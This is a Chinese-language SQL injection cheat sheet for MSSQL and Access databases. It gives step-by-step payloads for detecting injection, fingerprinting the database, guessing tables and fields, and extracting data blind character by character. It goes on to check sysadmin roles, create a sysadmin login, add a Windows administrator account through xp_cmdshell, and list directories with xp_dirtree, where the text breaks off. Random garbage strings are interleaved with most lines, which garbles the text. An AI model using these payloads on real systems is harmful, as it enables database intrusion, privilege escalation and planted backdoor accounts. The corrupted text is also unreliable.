1.判断是否有注入;and 1=1 ;and 1=2 BC|=-^(
2.初步判断是否是mssql ;and user>0 O2z{>\
k0[b4cr`
3.注入参数是字符'and [查询条件] and ''=' =z_.RE
`1;m:,9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' F\LAw#IJ
)?es3Ehqq
5.判断数据库系统 <0R$yB
|]s/NNU
;and (select count(*) from sysobjects)>0 mssql ,|:TML
%+BiN)R*x
;and (select count(*) from msysobjects)>0 access _Z9HOl@
6k569c{7
S}QvG&c
SxyXz8+e[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 2VB|a;Mo
E]T>m!6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =~qQ?;on
.K
I6<k/
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 R<* c
\PHbJN:BI
9.(1)猜字段的ascii值(access) 2L\}
&`]Lg?J
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 T9&-t7:
TU-aL
(2)猜字段的ascii值(mssql) {0~ Sj%Ze
R;XG2
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 HhZlHL
mI$<+S1!
10.测试权限结构(mssql) c~,OU7[
3mmp5 d
yf
7Sz$Eq
vIMLUL0
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- `=}w(V8pc
`1O<UJX
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [SJ-]P|^l
=I(F(AE
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7IEG%FY
T
#Qir%\*V
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- q:iB}ch5R
VXfp=JE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- PM(M c]6
ET2^1X#j
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- te<lCD6
JI)@h 4b
;and 1=(select IS_MEMBER('db_owner'));-- \w6A-daD0
VM.4w.})_E
E((U=P}+g
)qbjX{GZ7
11.添加mssql和系统的帐户 _"4u?C#
,\%qERk
;exec master.dbo.sp_addlogin username;-- Q;h6F{i
;exec master.dbo.sp_password null,username,password;-- OrG1Mfx&2%
zyHHz\{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- _NwB7@ e
b23 5Zm
;exec master.dbo.xp_cmdshell 'net user username password 8lNkY`P7s
l-mt{2
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $2><4~T;|A
#?3oGrS Y
;exec master.dbo.xp_cmdshell 'net user username password /add';-- u`ezQvrcy
[$x&J6jF.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- A.8[FkiNmD
W Z_yaG$U
Q
1:7 9
3$~oQC
12.(1)遍历目录 4.t72*ML
i(9 5=t(
;create table dirs(paths varchar(100), id int) DI)!x {"
G+SMH`h
;insert dirs exec master.dbo.xp_dirtree 'c:\' CI8bHY$
9&O7